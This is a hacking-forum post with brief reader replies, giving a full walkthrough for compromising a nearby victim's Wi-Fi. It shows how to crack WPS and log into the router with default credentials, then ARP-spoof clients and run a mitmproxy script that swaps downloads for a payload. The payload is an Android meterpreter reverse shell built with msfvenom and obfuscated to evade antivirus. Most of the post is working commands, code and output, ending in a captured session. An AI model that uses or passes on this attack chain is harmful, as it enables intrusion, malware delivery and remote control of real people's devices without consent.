Target Wi-FI pwn -> MITM File injection -> meterpreter session (or another article on MITM)

[Tr0jan_Horse]

​

In general, what we need:
oneshot.py - a kind of analogue of all WiFi, Airgeddon, WiFiautopnevner, which works even with Nokia without monitor mode
arpspoof - binary version works spoofer mac addresses works much more stable than analogs
bettercap2 (purely for process visualization, + very convenient net.sniff sniffer)
mitmproxy 6 dev - a hard thing. It is used as a traffic analyzer and, strictly speaking, a transparent proxy.
a couple of lines of code in python, as a plugin for mithmproxy
msfvenom - our implant generator
msfconsole - our backconnect handler
obfuskapk - open source APK crypter

1)

ifconfig wlx00c0caa79483 down && macchanger -r wlx00c0caa79483

2)
We pull ourselves up in the passenger compartment of our car to the victim’s window.
It is worth noting here that if your target is quite far from you, and there is no way to get closer, then you can get out of the car and walk, remembering that radio waves tend to reflect off the surface (especially concrete) and "slide" over the water surface.
we open the laptop, take the card and the directional antenna, point it at the victim's window and launch

[B] ./oneshot.py -i wlx00c0caa79483 -K -F  [/B]

we get a list of victims, we choose, we get a password. How the pixel-dat attack works can be read on the Internet.
if you are on Linux -

nano /etc/network/interfaces

auto wlx00c0caa79483
allow-hotplug wlx00c0caa79483
iface wlx00c0caa79483 inet dhcp

wpa-essid target_name
wpa-psk target_passswd

If you are not on Linux, install Linux.

service networking restart

Important point - NetworkManager is not compatible with networking - these are two different services on Linux systems. Usually, out of the box, they are both present in the system, but the gravity version works - that is, the first one. I don't like it, since it often interferes and independently reconnects to etc. with a better signal and the like. So we turn it off, and turn on networking

Next, let's see what we have in the grid

ifconfig

wlx00c0caa79483: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.113 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::5c6f:c8ff:fe3c:e0e1 prefixlen 64 scopeid 0x20<link>
ether 5e:6f:c8:3c:e0:e1 txqueuelen 1000 (Ethernet)
RX packets 1100433 bytes 1173759849 (1.0 GiB)
RX errors 0 dropped 16688 overruns 0 frame 0
TX packets 630981 bytes 285821634 (272.5 MiB)
TX errors 0 dropped 1 overruns 0 carrier 0 collisions 0

you will see something like this, only with its own interface name.

2)
let's look at the gate:
# route -n

Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 wlx00c0caa79483
169.254.0.0 0.0.0.0 255.255.0.0 U 1000 0 0 wlx00c0caa79483
192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 wlx00c0caa79483

we open 192.168.0.1 in the browser, there often hangs the victim's router's face. admin:admin -> we get into the router.
If there is no admin:admin -> then we google what is there and get into the router. If we can't google it, then we try this way or brute force it.

You can also run nmap on the gate and see what's spinning on it. It happens that there are several routers in one network. And it happens that the router has port 22 that you can connect to via telnet.

Why? That would cut out client isolation and all sorts of network screens.

turned on, let's move on

# nmap -sS -sV -T4 -O -Pn -T 5 192.168.0.0/24

Nmap scan report for 192.168.0.103
Host is up (0.035s latency).
All 1000 scanned ports on 192.168.0.103 are closed (956) or filtered (44)
MAC Address: FE:F5:82:11:F9:0F (Unknown)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

or as you like, bettercap2 is also possible -->
# net.sniff on; net.show ;

┌───────────────┬───────────────────┬─────────────────┬───────────────────────────────┬───────┬───────┬──────────┐
│     IP ▴      │        MAC        │      Name       │            Vendor             │ Sent  │ Recvd │   Seen   │
├───────────────┼───────────────────┼─────────────────┼───────────────────────────────┼───────┼───────┼──────────┤
│ 192.168.0.113 │ 5e:6f:c8:3c:e0:e1 │ wlx00c0caa79483 │                               │ 0 B   │ 0 B   │ 09:17:23 │
│ 192.168.0.1   │ c4:71:54:c3:9b:a6 │ gateway         │ Tp-Link Technologies Co.,Ltd. │ 25 kB │ 27 kB │ 09:17:23 │
│               │                   │                 │                               │       │       │          │
│ 192.168.0.2   │ 30:b5:c2:d3:72:8a │                 │ Tp-Link Technologies Co.,Ltd. │ 32 kB │ 28 kB │ 09:17:48 │
│ 192.168.0.100 │ d0:03:df:1b:0f:b7 │                 │ Samsung Electronics Co.,Ltd   │ 0 B   │ 0 B   │ 09:17:36 │
│ 192.168.0.102 │ c8:3d:dc:12:35:55 │                 │                               │ 30 kB │ 31 kB │ 09:17:48 │
│ 192.168.0.103 │ fe:f5:82:11:f9:0f │                 │                               │ 23 kB │ 25 kB │ 09:17:46 │
│ 192.168.0.104 │ b4:74:43:f9:b8:11 │                 │ Samsung Electronics Co.,Ltd   │ 38 kB │ 41 kB │ 09:17:46 │
│ 192.168.0.106 │ 9c:4e:36:6b:1d:98 │                 │ Intel Corporate               │ 0 B   │ 37 kB │ 09:17:36 │
└───────────────┴───────────────────┴─────────────────┴───────────────────────────────┴───────┴───────┴──────────┘

basically, we have defined the goal, it's time to spoof it. that is, to shout to the entire local network that it is I who am the router, not him, give me all your packets.

For this we will launch mitmproxy. Having previously written a plugin for it redirect_requests.py

import mitmproxy
import subprocess
from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    if flow.request.host != "your_server" and flow.request.pretty_url.endswith(".exe") or flow.request.pretty_url.endswith(".cab"):
        print("[+] О, Look, the bastard is downloading something for Windows.")
        #flow.request.host = "mitmproxy.org"
        front_file = flow.request.pretty_url + "#"
        flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location":"http://your_server/EU.exe"})
        print("[?] All fascists get a grenade!")

    if flow.request.host != "your_server" and flow.request.pretty_url.endswith(".apk") or flow.request.pretty_url.endswith(".pdf"):
        print("[+] О, Look, the bastard is downloading something for Android.")
        front_file = flow.request.pretty_url + "#"
        flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location":"http://your_server/calc.apk"})
        print("[?] All fascists get a grenade!")

the meaning of the script is simple, if mimproxy sees that the victim wants to download apk or pdf (for example) - then it is sent to our server, instead of the original one, where the pre-prepared who? correctly payload is already located!
# mitmproxy --mode transparent --rawtcp --ssl-insecure --listen-host 192.168.0.113 --server --listen-port 8080 --anticomp --showhost --anticache -s ../complex/sslstrip.py -s redirect_requests.py

nothing. now we need to see if everything is as we intended and run arpspoof
# arpspoof -i wlx00c0caa79483 -t 192.168.0.103 192.168.0.1

The syntax is not difficult to understand. -t attacked, and after it without the gate key. That is, the router.
spoofing started, and if everything is done correctly, you will see how packets go through our transparent proxy. but. but you will not see this, because first you need to do forwarding. and this is an interesting thing and I will share with you one crap that will work. first, turn on your iptables, iptables_legacy and so on. they are all already deprecated and will soon stop working. time to study nf_tables.
so turn on arpspoof for now!

First, let's create the mitm.conf config

table ip filter {
    chain FORWARD {
        type filter hook forward priority 0; policy accept;
    }

    chain INPUT {
        type filter hook input priority 0; policy accept;
    }

    chain OUTPUT {
        type filter hook output priority 0; policy accept;
    }
}
table ip nat {
    chain PREROUTING {
        type nat hook prerouting priority -100; policy accept;
        iifname "wlx00c0caa79483" tcp dport http counter packets 97 bytes 5804 dnat to 192.168.0.113:http-alt
        iifname "wlx00c0caa79483" tcp dport https counter packets 62 bytes 4231 dnat to 192.168.0.113:http-alt
        iifname "wlx00c0caa79483" meta l4proto tcp ip daddr 192.168.0.0/24 tcp dport 80 counter packets 0 bytes 0 dnat to 192.168.0.113:8080
        iifname "wlx00c0caa79483" meta l4proto tcp ip daddr 192.168.0.0/24 tcp dport 443 counter packets 0 bytes 0 dnat to 192.168.0.113:8080

    }

    chain INPUT {
        type nat hook input priority 100; policy accept;
    }

    chain POSTROUTING {
        type nat hook postrouting priority 100; policy accept;
        oifname "wlx00c0caa79483" counter packets 0 bytes 0 masquerade
    }

    chain OUTPUT {
        type nat hook output priority -100; policy accept;
    }
}

then we write:
# nft flush ruleset && nft -f /root/mitm.conf && nft list ruleset
in response you should see approximately what you wrote in the file. values can change dynamically, this is normal.
Of course, don't forget to enable forwarding.
# sysctl net.ipv4.conf.all.forwarding=1
# sysctl net.ipv6.conf.all.forwarding=1

everything should work, yo)
ah, yes. one more detail.

go to bettercap2 and write
help any.proxy

any.proxy (not running): A firewall redirection to any custom proxy.

   any.proxy on : Start the custom proxy redirection.
  any.proxy off : Stop the custom proxy redirection.

  Parameters

  any.proxy.dst_address : Address where the proxy is listening. (default=<interface address>)
     any.proxy.dst_port : Port where the proxy is listening. (default=8080)
        any.proxy.iface : Interface to redirect packets from. (default=<interface name>)
     any.proxy.protocol : Proxy protocol. (default=TCP)
  any.proxy.src_address : Leave empty to intercept any source address. (default=)
     any.proxy.src_port : Remote port to redirect when the module is activated. (default=80)

In principle, everything should work by default. If not, then set the values.

192.168.0.0/24 > 192.168.0.113  » any.proxy on
[09:41:19] [sys.log] [inf] any.proxy Applied redirection [wlx00c0caa79483] (TCP) :80 -> 192.168.0.113:8080

and now on faith
# arpspoof -i wlx00c0caa79483 -t 192.168.0.103 192.168.0.1


did everything work out? did the packages go through us? not bad bro. now it's time to sort out the payload)

we open the server via ssh and write

# msfvenom --platform android -a dalvik -p android/meterpreter/reverse_tcp LHOST=our_device LPORT=4444 -o payload.apk

No encoder or badchars specified, outputting raw payload
Payload size: 10178 bytes
Saved as: payload.apk

we get payload.apk, but any AV will bark at it like an Alabai at an alcoholic at three o'clock in the morning in the private sector.

That's why we use Obfuscapk

# python3.7 -m obfuscapk.cli -p -w ~/Fatrat_Generated/obf/ -d ~/Fatrat_Generated/obf.apk -o ConstStringEncryption -o Nop -o Goto -o RandomManifest -o Rebuild -o NewSignature -o NewAlignment ~/Fatrat_Generated/app_backdoor.apk

Running obfuscators (NewAlignment): 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████|[01:01<00:00, 8.84s/obfuscator]
files: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████|[00:07<00:00, 984.63file/s]

we will put the received obf.apk on our server and call it, for example, calc.apk

launch metasploit

# msfconsole

_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\


=[ metasploit v5.0.67-dev- ]
+ -- --=[ 1957 exploits - 1092 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

use exploit/multi/handler
msf5 exploit(multi/handler) >
set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >
# handler -H 0.0.0.0 -P 4444 -n op6 -p android/meterpreter/reverse_tcp

[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 0.0.0.0:4444

that's it. we wait until the victim starts the load.

[*] Sending stage (73560 bytes) to 79.110.129.176
[*] Meterpreter session 1 opened (твой_ипи:4444 -> 79.110.129.176:25463) at 2020-01-06 11:14:42 +0300
sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter dalvik/android u0_a289 @ localhost твой_ипи:4444 -> 79.110.129.176:25463 (fe80::805d:26ff:fec8:b98e)

p.s. don't forget to turn on arpspoof so it doesn't interfere.

Have a good day!

 

[quaz1s]

123

 

[Guerra007]

thanks

 

[Cash2803]

+

 

[ThaBoss8997]

+

 

[Cjlee714]

!

 

[StarlightOG]

respect

 

[CristalineX i]

respect

 

[Koryphae]

+

 

[Drogg11]

q

 

[444zo0]

ty

 

[MrSwitch7654]

ok

 

[grits_guy]

hm

 

[mrsol]

good